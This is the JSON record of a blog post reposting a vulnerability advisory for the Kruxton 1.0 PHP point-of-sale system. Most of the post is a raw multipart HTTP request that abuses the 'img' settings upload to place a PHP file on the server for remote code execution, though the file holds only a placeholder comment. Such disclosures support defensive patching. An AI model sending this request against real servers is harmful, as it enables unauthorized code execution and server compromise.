{"id":56267,"date":"2024-04-15T21:19:47","date_gmt":"2024-04-15T17:19:47","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178057\/kruxton10-shell.txt"},"modified":"2024-04-15T21:19:47","modified_gmt":"2024-04-15T17:19:47","slug":"kruxton-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/kruxton-1-0-shell-upload\/","title":{"rendered":"Kruxton 1.0 Shell Upload"},"content":{"rendered":"<p>## Title: kruxton-1.0-FileUpload-RCE<br \/>## Author: nu11secur1ty<br \/>## Date: 04\/15\/2024<br \/>## Vendor: https:\/\/www.mayurik.com\/<br \/>## Software: https:\/\/www.sourcecodester.com\/php\/16127\/best-pos-management-system-php.html<br \/>## Reference: https:\/\/portswigger.net\/web-security\/file-upload<\/p>\n<p>## Description:<br \/>The system setting with parameter IMG is vulnerable to File Upload<br \/>vulnerability.<br \/>The attacker can upload a very malicious PHP file into the server and<br \/>then he can execute it<br \/>This is a potential CRITICAL PROBLEM!<\/p>\n<p>STATUS: HIGH- Vulnerability<\/p>\n[+]Payload:<br \/>&#8220;`POST<br \/>POST \/kruxton\/ajax.php?action=save_settings HTTP\/1.1<br \/>Host: localpwnedhost.com<br \/>Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;<br \/>PHPSESSID=lp21rf44drtnogjboa8v7lpmg1<br \/>Content-Length: 1043<br \/>Sec-Ch-Ua: &#8220;Chromium&#8221;;v=&#8221;123&#8243;, &#8220;Not:A-Brand&#8221;;v=&#8221;8&#8243;<br \/>Accept: *\/*<br \/>Content-Type: multipart\/form-data;<br \/>boundary=&#8212;-WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>X-Requested-With: XMLHttpRequest<br \/>Sec-Ch-Ua-Mobile: ?0<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/123.0.6312.88<br \/>Safari\/537.36<br \/>Sec-Ch-Ua-Platform: &#8220;Windows&#8221;<br \/>Origin: https:\/\/localpwnedhost.com<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: cors<br \/>Sec-Fetch-Dest: empty<br \/>Referer: https:\/\/localpwnedhost.com\/kruxton\/index.php?page=site_settings<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept-Language: en-US,en;q=0.9<br \/>Priority: u=1, i<br \/>Connection: close<\/p>\n<p>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&#8221;name&#8221;<\/p>\n<p>Kruxton Bristo By Mayuri K<br \/>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&#8221;email&#8221;<br \/>mayuri.infospace@gmail.com<br \/>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&#8221;contact&#8221;<\/p>\n<p>9000000000<br \/>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&#8221;about&#8221;<\/p>\n<p>&lt;p&gt;Kruxton Bristo By Mayuri K&lt;\/p&gt;&lt;p data-f-id=&#8221;pbf&#8221; style=&#8221;text-align:<br \/>center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:<br \/>sans-serif;&#8221;&gt;Powered by &lt;a<br \/>href=&#8221;https:\/\/www.froala.com\/wysiwyg-editor?pb=1&#8243; title=&#8221;Froala<br \/>Editor&#8221;&gt;Froala Editor&lt;\/a&gt;&lt;\/p&gt;<br \/>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq<br \/>Content-Disposition: form-data; name=&#8221;img&#8221;; filename=&#8221;1nsi1deyou.php&#8221;<br \/>Content-Type: application\/octet-stream<\/p>\n<p>&lt;?php<br \/>\/\/ by nu11secur1ty &#8211; 2024<br \/>\/\/Your malicious code here<br \/>?&gt;<\/p>\n<p>&#8212;&#8212;WebKitFormBoundaryUwsdkjlNQ5exBwrq&#8211;<br \/>&#8220;`<\/p>\n<p>## Reproduce:<br \/>[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2023\/kruxton-1.0)<\/p>\n<p>## Proof and Exploit:<br \/>[href](https:\/\/www.nu11secur1ty.com\/2024\/04\/kruxton-10-fileupload-rce.html)<\/p>\n<p>## Time spent:<br \/>00:15:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: kruxton-1.0-FileUpload-RCE## Author: nu11secur1ty## Date: 04\/15\/2024## Vendor: https:\/\/www.mayurik.com\/## Software: https:\/\/www.sourcecodester.com\/php\/16127\/best-pos-management-system-php.html## Reference: https:\/\/portswigger.net\/web-security\/file-upload ## Description:The system setting with parameter IMG is vulnerable to File Uploadvulnerability.The attacker can upload a very malicious PHP file into the server andthen he can execute itThis is a potential CRITICAL PROBLEM! STATUS: HIGH- Vulnerability [+]Payload:&#8220;`POSTPOST \/kruxton\/ajax.php?action=save_settings HTTP\/1.1Host: localpwnedhost.comCookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;PHPSESSID=lp21rf44drtnogjboa8v7lpmg1Content-Length: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56267","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56267","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56267"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56267\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56267"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56267"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56267"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}